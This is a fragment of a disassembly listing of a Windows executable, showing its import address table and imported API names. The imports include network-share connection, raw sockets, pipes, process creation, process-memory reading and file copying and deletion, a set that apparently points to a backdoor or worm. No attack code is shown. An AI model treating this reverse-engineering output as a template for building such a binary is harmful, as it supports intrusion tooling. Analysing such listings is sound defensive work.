dd 0F5CDEh, 0F5CEAh, 0F5CF4h, 0F5D04h, 0F5D12h, 0F5D26h
dd 0F5D32h, 0F5D3Ch, 0F5D48h, 0
dd 0F5558h, 0
dd 80000007h, 8000000Fh, 8000000Ch, 80000074h, 80000073h
dd 80000015h, 8000000Ah, 80000002h, 8000000Dh, 80000001h
dd 0F5576h, 8000000Bh, 80000009h, 80000004h, 80000010h
dd 80000003h, 80000017h, 80000013h, 80000012h, 80000097h
dd 80000006h, 80000034h, 0
dword_4F52D4 dd 77E78147h ; DATA XREF: sub_417A8B+BC�r
; .text:0043AD6A�r
dword_4F52D8 dd 77E6BD68h ; DATA XREF: ___crtsetenv+2C5�r
; .text:0043AF44�r
dword_4F52DC dd 77E77F2Eh ; DATA XREF: ___crtCompareStringA+41�r
; ___crtCompareStringA+3DA�r ...
dword_4F52E0 dd 77E762D0h ; DATA XREF: ___crtCompareStringA+69�r
; ___crtCompareStringA+D9�r ...
dword_4F52E4 dd 77E78723h ; DATA XREF: ___crtGetLocaleInfoW+37�r
; ___crtGetLocaleInfoW+8B�r ...
dword_4F52E8 dd 77E70192h ; DATA XREF: __chsize_lk+1D8�r
; .text:0043AF2C�r
dword_4F52EC dd 77E79C94h ; DATA XREF: _GetLcidFromDefault+12�r
; .text:0043AF26�r
dword_4F52F0 dd 77E6363Bh ; DATA XREF: _GetLcidFromLangCountry+7A�r
; _GetLcidFromLanguage+53�r ...
dword_4F52F4 dd 77E75243h ; DATA XREF: ___get_qualified_locale+142�r
; .text:0043AF1A�r
dword_4F52F8 dd 77E752B8h ; DATA XREF: ___get_qualified_locale+15C�r
; .text:0043AF14�r
dword_4F52FC dd 77E7176Ch ; DATA XREF: _ValidateExecute(int (*)(void))+F�r
; .text:0043AF0E�r
dword_4F5300 dd 77E7C9E7h ; DATA XREF: __CxxSetUnhandledExceptionFilter(void)+8�r
; __CxxRestoreUnhandledExceptionFilter(void)+9�r ...
dword_4F5304 dd 77E7C866h ; DATA XREF: ___crtGetStringTypeA+3C�r
; ___crtGetStringTypeA+19E�r ...
dword_4F5308 dd 77E641EBh ; DATA XREF: ___crtGetStringTypeA+61�r
; ___crtGetStringTypeA+AA�r ...
dword_4F530C dd 77E73FF9h ; DATA XREF: unknown_libname_25+7F�r
; .text:0043AEF6�r
dword_4F5310 dd 77E7FF2Eh ; DATA XREF: __set_osfhnd+58�r
; __set_osfhnd+66�r ...
dword_4F5314 dd 77E78406h ; DATA XREF: __ioinit+1E6�r
; __ioinit+29B�r ...
dword_4F5318 dd 77E7C931h ; DATA XREF: __ioinit+31A�r
; .text:0043AEE4�r
dword_4F531C dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+1D�r
; ___crtGetEnvironmentStringsA+6D�r ...
dword_4F5320 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_42FB88�r
; ___crtGetEnvironmentStringsA+171�r ...
dword_4F5324 dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+108�r
; ___crtGetEnvironmentStringsA+150�r ...
dword_4F5328 dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+1E6�r
; ___crtGetEnvironmentStringsA+208�r ...
dword_4F532C dd 77EB9A84h ; DATA XREF: __XcptFilter+37�r
; .text:0043AEC6�r
dword_4F5330 dd 77E781F9h ; DATA XREF: ___crtLCMapStringA+41�r
; ___crtLCMapStringA+1A5�r ...
dword_4F5334 dd 77E77405h ; DATA XREF: ___crtLCMapStringA+69�r
; ___crtLCMapStringA+C0�r ...
dword_4F5338 dd 77E75CB5h ; DATA XREF: sub_401317+DF�r
; WinMain(x,x,x,x)+7A�r ...
dword_4F533C dd 77E77963h ; DATA XREF: sub_401317+B8�r
; WinMain(x,x,x,x)+2DB�r ...
dword_4F5340 dd 77E61BB8h ; DATA XREF: sub_401317+A7�r
; WinMain(x,x,x,x)+2C3�r ...
dword_4F5344 dd 77E7A099h ; DATA XREF: sub_401317+83�r
; WinMain(x,x,x,x)+DA�r ...
dword_4F5348 dd 77E704FCh ; DATA XREF: sub_401317+74�r
; WinMain(x,x,x,x)+C4�r ...
dword_4F534C dd 77E61BE6h ; DATA XREF: sub_401317+29�r
; WinMain(x,x,x,x)+1F4�r ...
dword_4F5350 dd 77E7AC37h ; DATA XREF: WinMain(x,x,x,x)+3C1�r
; sub_401CC7+7AC�r ...
dword_4F5354 dd 77E73628h ; DATA XREF: WinMain(x,x,x,x)+33B�r
; sub_401CC7+7927�r ...
dword_4F5358 dd 77E706B7h ; DATA XREF: WinMain(x,x,x,x)+274�r
; sub_417DE6+15�r ...
dword_4F535C dd 77E80656h ; DATA XREF: WinMain(x,x,x,x)+267�r
; .text:0043AC56�r
dword_4F5360 dd 77F5157Dh ; DATA XREF: WinMain(x,x,x,x)+1D8�r
; WinMain(x,x,x,x)+3E6�r ...
dword_4F5364 dd 77E6BD13h ; DATA XREF: WinMain(x,x,x,x):loc_4015D6�r
; .text:0043AC62�r
dword_4F5368 dd 77E70396h ; DATA XREF: WinMain(x,x,x,x)+1B5�r
; WinMain(x,x,x,x)+221�r ...
dword_4F536C dd 77E74CABh ; DATA XREF: WinMain(x,x,x,x)+19E�r
; sub_410134+110�r ...
dword_4F5370 dd 77E79F93h ; DATA XREF: WinMain(x,x,x,x)+D3�r
; sub_409DD4+2�r ...
dword_4F5374 dd 77E79D5Bh ; DATA XREF: WinMain(x,x,x,x)+6B�r
; WinMain(x,x,x,x)+311�r ...
dword_4F5378 dd 77E7C2C4h ; DATA XREF: WinMain(x,x,x,x)+64�r
; .text:0043AC80�r
dword_4F537C dd 77E7751Ah ; DATA XREF: WinMain(x,x,x,x)+2C�r
; sub_401CC7+2551�r ...
dword_4F5380 dd 77E75CEBh ; DATA XREF: sub_401CC7+7B9F�r
; sub_40B891+2B�r ...
dword_4F5384 dd 77E6AD34h ; DATA XREF: sub_401CC7+6A2C�r
; sub_4190F6+35�r ...
dword_4F5388 dd 77E71AFEh ; DATA XREF: sub_401CC7+67F6�r
; .text:0043AC98�r
dword_4F538C dd 77E805D8h ; DATA XREF: sub_409DD4+13A�r
; sub_409DD4:loc_40A2E2�r ...
dword_4F5390 dd 77E7A5FDh ; DATA XREF: sub_409DD4+11�r
; sub_417A8B+60�r ...
dword_4F5394 dd 77E65F4Ch ; DATA XREF: sub_40B182+26�r
; sub_41A460+34�r ...
dword_4F5398 dd 77E7513Ch ; DATA XREF: sub_40B228+22�r
; ___get_qualified_locale+18�r ...
dword_4F539C dd 77E7C657h ; DATA XREF: sub_40B29D+21�r
; sub_41927E+32�r ...
dword_4F53A0 dd 77E73C49h ; DATA XREF: sub_40B7C1+4A�r
; sub_40BF01+1AF�r ...
dword_4F53A4 dd 77F7E300h ; DATA XREF: sub_40C951+142�r
; __unlock_file+35�r ...
dword_4F53A8 dd 77F7E21Fh ; DATA XREF: sub_40C951+D7�r
; __lock_file+35�r ...
dword_4F53AC dd 77E7C706h ; DATA XREF: sub_40CB69+77�r
; .text:0043ACCE�r
dword_4F53B0 dd 77F53275h ; DATA XREF: sub_40CB69+6B�r
; sub_40CB69+22F�r ...
dword_4F53B4 dd 77E79D8Ch ; DATA XREF: sub_40E2D9+94�r
; sub_40E3C7+184�r ...
dword_4F53B8 dd 77E737DEh ; DATA XREF: sub_40E3C7+43D�r
; .text:0043ACE0�r
dword_4F53BC dd 77E78B82h ; DATA XREF: sub_40E3C7+1AC�r
; sub_40E3C7+49C�r ...
dword_4F53C0 dd 77E7A837h ; DATA XREF: sub_40E3C7+AA�r
; sub_410134+1CB�r ...
dword_4F53C4 dd 77E616B4h ; DATA XREF: sub_40EF74+19B�r
; sub_411756+115�r ...
dword_4F53C8 dd 77E79CE3h ; DATA XREF: sub_40EF74+111�r
; sub_4119A0+77�r ...
dword_4F53CC dd 77E79C90h ; DATA XREF: sub_40EF74+FD�r
; sub_40EF74+10A�r ...
dword_4F53D0 dd 77E7727Ah ; DATA XREF: sub_40EF74+74�r
; sub_4118A7+23�r ...
dword_4F53D4 dd 77E64106h ; DATA XREF: sub_40FFB1+A0�r
; sub_41B92C+1B6�r ...
dword_4F53D8 dd 77E64006h ; DATA XREF: sub_40FFB1+8C�r
; sub_41B92C+19F�r ...
dword_4F53DC dd 77E793EFh ; DATA XREF: sub_410134+1F5�r
; sub_410A71+38�r ...
dword_4F53E0 dd 77E78EAAh ; DATA XREF: sub_4103EB+5EC�r
; sub_41793D+BA�r ...
dword_4F53E4 dd 77E79424h ; DATA XREF: sub_4103EB+280�r
; sub_417DE6+135�r ...
dword_4F53E8 dd 77E794BFh ; DATA XREF: sub_4103EB+272�r
; sub_417DE6+123�r ...
dword_4F53EC dd 77E75E67h ; DATA XREF: sub_4103EB+212�r
; sub_4103EB+5DB�r ...
dword_4F53F0 dd 77E75D9Eh ; DATA XREF: sub_4103EB+201�r
; sub_41793D+26�r ...
dword_4F53F4 dd 77E78C81h ; DATA XREF: sub_410A71+6C�r
; sub_416980+259�r ...
dword_4F53F8 dd 77E76968h ; DATA XREF: sub_4114CE+5F�r
; .text:004307CA�r ...
dword_4F53FC dd 77E74C59h ; DATA XREF: sub_411756+C7�r
; .text:0043AD46�r
dword_4F5400 dd 77EC7C51h ; DATA XREF: sub_411B2B+5E�r
; .text:0043AD4C�r
dword_4F5404 dd 77E70F89h ; DATA XREF: sub_412694+E�r
; sub_415C3F+D�r ...
dword_4F5408 dd 77E802FCh ; DATA XREF: sub_413589+18C�r
; sub_413589+2D4�r ...
dword_4F540C dd 77E6D75Bh ; DATA XREF: sub_413589+182�r
; sub_4142EC+FF�r ...
dword_4F5410 dd 77E80618h ; DATA XREF: sub_417A8B+170�r
; sub_419471+D4�r ...
dword_4F5414 dd 77F51597h ; DATA XREF: sub_417C5D+41�r
; sub_417C5D+F5�r ...
dword_4F5418 dd 77F516F8h ; DATA XREF: sub_417C5D+21�r
; sub_417DE6+4A�r ...
dword_4F541C dd 77E77CB7h ; DATA XREF: sub_417C5D+10�r
; sub_417DE6+40�r ...
dword_4F5420 dd 77E7F01Ah ; DATA XREF: sub_417DE6+88�r
; sub_417F8D+55�r ...
dword_4F5424 dd 77E61A54h ; DATA XREF: sub_417DE6+56�r
; sub_417F8D+97�r ...
dword_4F5428 dd 77E7C3A5h ; DATA XREF: sub_417DE6+34�r
; sub_417F8D+2E�r ...
dword_4F542C dd 77E76A60h ; DATA XREF: sub_418E65+2D�r
; .text:0043AD94�r
dword_4F5430 dd 77E71B14h ; DATA XREF: sub_418EEF+26�r
; .text:0043AD9A�r
dword_4F5434 dd 77E7166Fh ; DATA XREF: sub_418EEF+1D�r
; .text:0043ADA0�r
dword_4F5438 dd 77E75090h ; DATA XREF: sub_418F2A+6C�r
; .text:0043ADA6�r
dword_4F543C dd 77E74D76h ; DATA XREF: sub_418F2A+39�r
; .text:0043ADAC�r
dword_4F5440 dd 77E77797h ; DATA XREF: sub_418F2A+28�r
; .text:0043ADB2�r
dword_4F5444 dd 77E7011Ah ; DATA XREF: sub_418FAF+96�r
; .text:0043ADB8�r
dword_4F5448 dd 77E73CE2h ; DATA XREF: sub_418FAF+60�r
; .text:0043ADBE�r
dword_4F544C dd 77E668D9h ; DATA XREF: sub_4190F6+15D�r
; .text:0043ADC4�r
dword_4F5450 dd 77E79924h ; DATA XREF: sub_419A25+13�r
; ___crtLCMapStringA+2A5�r ...
dword_4F5454 dd 77E77CCEh ; DATA XREF: sub_419AF7+F�r
; __mbstowcs_lk+BF�r ...
dword_4F5458 dd 77E76A2Eh ; DATA XREF: sub_41A589+DE�r
; .text:0043ADD6�r
dword_4F545C dd 77E7FF65h ; DATA XREF: sub_41A9F0+5A�r
; .text:0043ADDC�r
dword_4F5460 dd 77EB7624h ; DATA XREF: sub_41A9F0+3D�r
; .text:0043ADE2�r
dword_4F5464 dd 77E6C29Dh ; DATA XREF: sub_41B081+1EA�r
; .text:0043ADE8�r
dword_4F5468 dd 77E76C1Ah ; DATA XREF: sub_41B92C+1CF�r
; .text:0043ADEE�r
dword_4F546C dd 77E73196h ; DATA XREF: __CrtIsValidPointer+2A�r
; ___sbh_heap_check+19�r ...
dword_4F5470 dd 77E7339Ch ; DATA XREF: __CrtIsValidPointer+12�r
; sub_4331E0+13�r ...
dword_4F5474 dd 77E6C924h ; DATA XREF: sub_41D910+93�r
; sub_41D910+102�r ...
dword_4F5478 dd 77F6183Eh ; DATA XREF: sub_43AE06�r
dword_4F547C dd 77E76E3Dh ; DATA XREF: _time+9F�r __tzset_lk+5E�r ...
dword_4F5480 dd 77E61608h ; DATA XREF: _time+17�r .text:0043AE12�r
dword_4F5484 dd 77E778C5h ; DATA XREF: __strupr+76�r __strupr+B6�r ...
dword_4F5488 dd 77E777EFh ; DATA XREF: __strupr+62�r _tolower+2C�r ...
dword_4F548C dd 77E6177Ah ; DATA XREF: start+E2�r __ioinit+87�r ...
dword_4F5490 dd 77E7C938h ; DATA XREF: start+B3�r .text:0043AE2A�r
dword_4F5494 dd 77E7C486h ; DATA XREF: start+26�r .text:0043AE30�r
dword_4F5498 dd 77EB36A5h ; DATA XREF: sub_422760+3�r
; .text:0043AE36�r
dword_4F549C dd 77E79C3Dh ; DATA XREF: __CrtSetReportFile+3E�r
; __CrtSetReportFile+58�r ...
dword_4F54A0 dd 77E9BD34h ; DATA XREF: __CrtDbgReport+102�r
; __CrtDbgReport+2F3�r ...
dword_4F54A4 dd 77E79908h ; DATA XREF: __mtinitlocks+9�r
; __mtinitlocks+16�r ...
dword_4F54A8 dd 77EB8503h ; DATA XREF: __lockerr_exit+9�r
; .text:0043AE4E�r
dword_4F54AC dd 77F5722Fh ; DATA XREF: sub_423880+DA�r
; sub_423880+1BB�r ...
dword_4F54B0 dd 77E79E34h ; DATA XREF: sub_424410+4A8�r
; sub_424410+545�r ...
dword_4F54B4 dd 77E7980Ah ; DATA XREF: ___sbh_alloc_new_region+A3�r
; ___sbh_alloc_new_group+A7�r ...
dword_4F54B8 dd 77E7AC5Eh ; DATA XREF: sub_426EF0+5F�r
; .text:0043AE66�r
dword_4F54BC dd 77E76E0Bh ; DATA XREF: sub_427120+57�r
; sub_427120+7C�r ...
dword_4F54C0 dd 77E7C726h ; DATA XREF: sub_427120+14�r
; .text:0043AE72�r
dword_4F54C4 dd 77E77CC4h ; DATA XREF: __mtinit+64�r __getptd+66�r ...
dword_4F54C8 dd 77E79B39h ; DATA XREF: __mtinit+4A�r __getptd+50�r ...
dword_4F54CC dd 77E7C5B4h ; DATA XREF: __mtinit+9�r
; .text:0043AE84�r
dword_4F54D0 dd 77E72B29h ; DATA XREF: __mtterm+17�r
; .text:0043AE8A�r
dword_4F54D4 dd 77F51587h ; DATA XREF: __getptd+8B�r
; .text:0043AE90�r
dword_4F54D8 dd 77E78B61h ; DATA XREF: __getptd+15�r
; __freeptd+1C�r ...
dword_4F54DC dd 77E73163h ; DATA XREF: .text:00429303�r
; .text:0043AE9C�r
dword_4F54E0 dd 77E7849Fh ; DATA XREF: __setmbcp+1C7�r
; _setSBUpLow+17�r ...
dword_4F54E4 dd 77E7A13Fh ; DATA XREF: _getSystemCP+35�r
; .text:0043AEA8�r
dword_4F54E8 dd 77E6C703h ; DATA XREF: _getSystemCP+1D�r
; .text:0043AEAE�r
dword_4F54EC dd 77E6D706h ; DATA XREF: __raise_exc+35A�r
; .text:0043AEB4�r ...
dd 0
dword_4F54F4 dd 71B2ACCBh ; DATA XREF: sub_43AB96�r
dd 0
dword_4F54FC dd 71AB4122h ; DATA XREF: sub_4155C6+D4�r
; .text:0043AC14�r
dword_4F5500 dd 71AB1746h ; DATA XREF: sub_4130E1+1DE�r
; .text:0043AC0E�r
dword_4F5504 dd 71AB401Ch ; DATA XREF: sub_4130E1+21B�r
; sub_4130E1+243�r ...
dword_4F5508 dd 71AB1836h ; DATA XREF: sub_40FA39+6E�r
; sub_40FAB6+8E�r ...
dword_4F550C dd 71AB41DAh ; DATA XREF: sub_40F402+4A�r
; sub_40FA39+15�r ...
dword_4F5510 dd 71AB3F8Dh ; DATA XREF: sub_40F402+5A�r
; .text:0043ABF6�r
dword_4F5514 dd 71AB155Ah ; DATA XREF: sub_40F402+8D�r
; sub_414146+70�r ...
dword_4F5518 dd 71AB3ECEh ; DATA XREF: sub_40F402+B5�r
; .text:0043ABEA�r
dword_4F551C dd 71AB5DE2h ; DATA XREF: sub_40F402+C9�r
; .text:0043ABE4�r
dword_4F5520 dd 71AB868Dh ; DATA XREF: sub_40F402+171�r
; .text:0043ABDE�r
dword_4F5524 dd 71AB5A01h ; DATA XREF: sub_4156AF+20�r
; .text:0043AC1A�r
dword_4F5528 dd 71AB12F8h ; DATA XREF: sub_40E8CF+27�r
; sub_40EA11+27�r ...
dword_4F552C dd 71AB1746h ; DATA XREF: sub_40E8CF+36�r
; sub_40EA11+36�r ...
dword_4F5530 dd 71AB3E5Dh ; DATA XREF: sub_40E8CF+59�r
; sub_40EA11+59�r ...
dword_4F5534 dd 71AB5690h ; DATA XREF: sub_40E8CF+6A�r
; sub_40EA11+6A�r ...
dword_4F5538 dd 71AB1A6Dh ; DATA XREF: sub_40E8CF+E0�r
; sub_40EA11+E0�r ...
dword_4F553C dd 71AB3C22h ; DATA XREF: sub_40DB0C+AF�r
; sub_40E8CF+45�r ...
dword_4F5540 dd 71AB1AF4h ; DATA XREF: sub_40D839+12�r
; sub_40E8CF+C3�r ...
dword_4F5544 dd 71AB1890h ; DATA XREF: sub_40D69B+4C�r
; sub_40F402+106�r ...
dword_4F5548 dd 71AB1B7Bh ; DATA XREF: sub_43ABA2�r
dword_4F554C dd 71AB157Eh ; DATA XREF: sub_401CC7+2F9D�r
; .text:0043AB9C�r
dword_4F5550 dd 71AB2BBFh ; DATA XREF: .text:0040EB12�r
; .text:0043ABD8�r
align 8
db 6
align 2
aWnetaddconne_1 db 'WNetAddConnection2A',0
aMpr_dll_0 db 'MPR.dll',0
aA_2 db 'A',0
aWsasocketa_0 db 'WSASocketA',0
align 4
aWs2_32_dll_0 db 'WS2_32.dll',0
align 10h
db '',0
aExitprocess db 'ExitProcess',0
a4_0 db '4',0
aClosehandle db 'CloseHandle',0
aF_2 db 'f',0
aCreateprocessa db 'CreateProcessA',0
align 2
dw 17Dh
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
db 0C1h ;
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 356h
aSleep db 'Sleep',0
aO_1 db 'o',0
aCreatethread db 'CreateThread',0
align 2
aG_1 db '',0
aDeletefilea db 'DeleteFileA',0
dd 704F0286h, 72506E65h, 7365636Fh, 1430073h
aGetcurrentproc db 'GetCurrentProcessId',0
db 71h ; q
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
aC_7 db 'C',0
aCopyfilea db 'CopyFileA',0
db 19h
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 15Eh
aGetfileattribu db 'GetFileAttributesA',0
align 4
db 7Fh ;
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 10h
db 90h ;
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 2
dw 1DFh
aGettickcount db 'GetTickCount',0
align 2
dw 35Fh
aTerminatethrea db 'TerminateThread',0
dd 654701D5h, 6D655474h, 74615070h, 4168h, 6F4D026Eh, 69466576h
dd 41656Ch, 6F4C0252h, 694C6461h, 72617262h, 4179h, 654701A0h
dd 6F725074h, 64644163h, 73736572h, 1140000h, 43746547h
dd 75706D6Fh, 4E726574h, 41656D61h, 1740000h, 4C746547h
dd 6C61636Fh, 666E4965h, 416Fh, 654701E9h, 72655674h, 6E6F6973h
dd 417845h, 784500BAh, 68547469h, 64616572h, 2510000h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aS_40 db '',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 224h
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
aB_1 db '',0
aDeletecritical db 'DeleteCriticalSection',0
dw 3A4h
aWritefile db 'WriteFile',0
aO_2 db 'O',0
aCreateeventa db 'CreateEventA',0
align 2
dw 2B5h
aReadfile_0 db 'ReadFile',0
align 2
aS_41 db 'S',0
aCreatefilea db 'CreateFileA',0
dd 6554035Eh, 6E696D72h, 50657461h, 65636F72h, 7373h, 75440093h
dd 63696C70h, 48657461h, 6C646E61h, 1420065h
aGetcurrentpr_0 db 'GetCurrentProcess',0
aE_1 db 'e',0
aCreatepipe db 'CreatePipe',0
align 4
dd 654701E0h, 6D695474h, 726F4665h, 4174616Dh, 1470000h
dd 44746547h, 46657461h, 616D726Fh, 4174h, 65470163h, 6C694674h
dd 7A695365h, 0CE0065h, 646E6946h, 736F6C43h, 0C50065h
aFiletimetosyst db 'FileTimeToSystemTime',0
align 2
db '',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db '',0
aFindnextfilea db 'FindNextFileA',0
db '',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
dw 31Bh
aSetfilepointer db 'SetFilePointer',0
align 4
db 0EEh ;
db 2, 53h, 65h
aTconsolectrlha db 'tConsoleCtrlHandler',0
db 8Eh ;
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 0FCh
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 2
dw 173h
aGetlocaltime db 'GetLocalTime',0
align 2
dw 2A3h
aQueryperform_1 db 'QueryPerformanceCounter',0
db 0A4h ;
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
dd 724600F8h, 694C6565h, 72617262h, 1590079h
aGetenvironment db 'GetEnvironmentVariableW',0
db 16h
db 2, 48h, 65h
aApfree db 'apFree',0
align 4
db 10h
db 2, 48h, 65h
aApalloc db 'apAlloc',0
db 0A3h ;
db 1, 47h, 65h
aTprocessheap db 'tProcessHeap',0
align 2
dw 389h
aVirtualqueryex db 'VirtualQueryEx',0
align 4
db 0B8h ;
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
dd 654701C5h, 73795374h, 496D6574h, 6F666Eh, 6F4600F3h
dd 74616D72h, 7373654Dh, 41656761h, 20A0000h, 626F6C47h
dd 6E556C61h, 6B636F6Ch, 2030000h, 626F6C47h, 6F4C6C61h
dd 6B63h, 6E550371h, 5670616Dh, 4F776569h, 6C694666h, 2680065h
dd 5670614Dh, 4F776569h, 6C694666h, 540065h
aCreatefilemapp db 'CreateFileMappingA',0
align 10h
db 1Fh
db 3, 53h, 65h
aTfiletime db 'tFileTime',0
dw 165h
aGetfiletime db 'GetFileTime',0
db '',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
db 94h ;
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 275h
aMultibytetowid db 'MultiByteToWideChar',0
db 0C3h ;
db 3, 6Ch, 73h
aTrcmpia db 'trcmpiA',0
db 5Ah ; Z
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 291h
aPeeknamedpipe db 'PeekNamedPipe',0
dw 178h
aGetlogicaldr_0 db 'GetLogicalDrives',0
align 2
dw 204h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
db 36h ; 6
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 33h ; 3
db 2, 49h, 73h
aBadreadptr db 'BadReadPtr',0
align 10h
db 20h
db 2, 48h, 65h
aApvalidate db 'apValidate',0
align 10h
db 0D7h ;
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 0E2h ;
db 1, 47h, 65h
aTtimezoneinfor db 'tTimeZoneInformation',0
align 2
dw 1C8h
aGetsystemtime db 'GetSystemTime',0
dw 228h
aInterlockeddec db 'InterlockedDecrement',0
align 2
dw 22Ch
aInterlockedinc db 'InterlockedIncrement',0
align 2
dw 1B7h
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470110h, 6D6F4374h, 646E616Dh, 656E694Ch, 1E80041h
dd 56746547h, 69737265h, 6E6Fh, 65440078h, 42677562h, 6B616572h
dd 1B90000h, 53746547h, 61486474h, 656C646Eh, 28D0000h
aOutputdebugstr db 'OutputDebugStringA',0
align 4
db 23h ; #
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSection',0
db '',0
aFatalappexita db 'FatalAppExitA',0
db 1Ah
db 2, 48h, 65h
aAprealloc db 'apReAlloc',0
dw 383h
aVirtualfree db 'VirtualFree',0
db 81h ;
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 58h ; X
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
dw 214h
aHeapdestroy db 'HeapDestroy',0
dd 65480212h, 72437061h, 65746165h, 1460000h
aGetcurrentthre db 'GetCurrentThreadId',0
align 10h
dd 6C540366h, 74655373h, 756C6156h, 3630065h, 41736C54h
dd 636F6C6Ch, 3640000h, 46736C54h, 656572h, 65530328h
dd 73614C74h, 72724574h, 726Fh, 6C540365h, 74654773h, 756C6156h
dd 1450065h, 43746547h, 65727275h, 6854746Eh, 64616572h
dd 1040000h, 43746547h, 666E4950h, 0FD006Fh, 41746547h
dd 5043h, 65470193h, 4D454F74h, 5043h, 615202A7h, 45657369h
dd 70656378h, 6E6F6974h, 2440000h, 614D434Ch, 72745370h
dd 41676E69h, 2450000h, 614D434Ch, 72745370h, 57676E69h
dd 36E0000h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
dw 0F6h
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 0F7h ;
align 2
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 155h
aGetenvironme_0 db 'GetEnvironmentStrings',0
dw 157h
aGetenvironme_1 db 'GetEnvironmentStringsW',0
align 4
db 24h ; $
db 3, 53h, 65h
aThandlecount db 'tHandleCount',0
align 2
dw 166h
aGetfiletype db 'GetFileType',0
db 37h ; 7
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
aU_1 db '',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 10h
db 0BAh ;
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1BDh
aGetstringtypew db 'GetStringTypeW',0
align 4
db 4Ah ; J
db 3, 53h, 65h
aTunhandledexce db 'tUnhandledExceptionFilter',0
dw 230h
aIsbadcodeptr db 'IsBadCodePtr',0
align 2
dw 241h
aIsvalidlocale db 'IsValidLocale',0
dw 23Fh
aIsvalidcodepag db 'IsValidCodePage',0
aP_1 db '',0
aEnumsystemloca db 'EnumSystemLocalesA',0
align 2
dw 1E3h
aGetuserdefault db 'GetUserDefaultLCID',0
align 10h
dd 65530310h, 646E4574h, 6946664Fh, 656Ch, 65470175h, 636F4C74h
dd 49656C61h, 576F666Eh, 3A0000h, 706D6F43h, 53657261h
dd 6E697274h, 4167h, 6F43003Bh, 7261706Dh, 72745365h, 57676E69h
dd 3130000h
aSetenvironment db 'SetEnvironmentVariableA',0
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
_idata ends
; Section 6. (virtual address 000FC000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 000FB200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4FC000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start